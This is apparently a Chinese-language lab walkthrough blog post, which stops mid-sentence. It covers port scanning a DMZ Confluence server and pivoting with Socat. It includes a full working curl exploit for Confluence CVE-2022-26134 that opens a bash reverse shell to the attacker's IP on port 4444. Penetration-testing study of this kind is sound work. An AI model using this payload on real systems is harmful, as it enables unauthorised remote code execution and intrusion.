發表文章

目前顯示的是有「Socat」標籤的文章

Socat 連接埠轉發

圖片
 Socat 連接埠轉發 環境說明 攻擊機 Kali IP : 192.168.45.200 DMZ 對外開放之 Web Server IP & Port : 192.168.229.63, 8090 靶機內網 DB IP : 10.4.229.215 第一步一樣先 rustscan 外網機器,僅開了 22, 8090, 8091 Port rustscan -a 192.168.229.63 --scripts none --ulimit 5000 nmap 列舉這三個 Port 服務,sudo nmap -sC -sV -p 22,8090,8091 192.168.229.63 22 是 SSH,8090 是 HTTP Service 8091 也是 HTTP Service whatweb 8090 發現是 Confluence 依據此網站介紹的 Confluence Web CVE 弱點 https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/ 我們將利用以下這一段指令來建立 Reverse Shell POC 指令 :  curl -v http://192.168.229.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.45.200/4444%200%3E%261%27%29.start%28%29%22%29%7D/ nc 4444 進來了,whoami 確認是 confluence 服務帳號 ip ro or ip addr 查看網路確認有另外一隻腳 10.4.229.63 (ens224) 由於這是一個有限的服務帳號所以可以看到的東西不多,但一樣要進行枚舉 尤其服務帳號一定要看網站設定檔與 Log 結果在 ...